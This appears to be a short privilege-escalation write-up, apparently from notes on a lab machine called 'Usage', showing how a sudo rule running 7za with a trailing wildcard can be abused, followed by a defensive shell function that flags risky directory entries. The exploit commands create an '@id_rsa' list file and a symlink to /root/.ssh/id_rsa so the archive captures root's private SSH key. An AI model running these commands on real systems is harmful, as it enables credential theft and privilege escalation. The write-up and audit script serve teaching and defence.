Wildcard on compression binaries

7-Zip

In this example I found that my user can execute the following as root (sudo). The vulnerable part is *

/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *

To exploit it, you only have to create a symbolic link that points to the target file and execute the binary. Finally, unzip the file and access the desired file.

touch @id_rsa
ln -s /root/.ssh/id_rsa id_rsa

Machine: Usage
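
On the defensive side, as an added example that is not part of the original notes: a shell function an administrator could run against the directory that such a sudo rule archives, flagging the entries that the * expansion would hand to 7za as something other than a plain file. The function name and output labels are hypothetical, and GNU readlink is assumed.

```shell
#!/bin/sh
# Added example (not from the original notes): pre-flight audit of a directory
# that a privileged job archives with a trailing "*".
# Usage: audit_backup_dir /path/to/dir
# Prints one line per risky entry; returns 0 if clean, 1 if anything was flagged.
audit_backup_dir() {
    dir=$(cd "$1" 2>/dev/null && pwd -P) || { echo "ERROR no such dir: $1"; return 2; }
    found=0
    # Same set of names the shell would pass to the command for "*".
    for path in "$dir"/*; do
        # Skip an unmatched glob, but keep dangling symlinks.
        [ -e "$path" ] || [ -L "$path" ] || continue
        name=${path##*/}
        case $name in
            @*) echo "LISTFILE $name"; found=1 ;;   # 7-Zip list-file syntax
            -*) echo "SWITCH $name"; found=1 ;;     # would look like an option
        esac
        if [ -L "$path" ]; then
            # Resolve the link; an unreadable or missing target counts as risky.
            target=$(readlink -f -- "$path" 2>/dev/null) || target=""
            case $target in
                "$dir"/*) ;;                         # stays inside the directory
                *) echo "SYMLINK $name -> ${target:-unresolved}"; found=1 ;;
            esac
        fi
    done
    return "$found"
}
```

A non-zero return is a reason to stop the backup job and inspect the directory; the more durable fix is to remove the wildcard from the sudo rule and archive a fixed, root-owned path.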
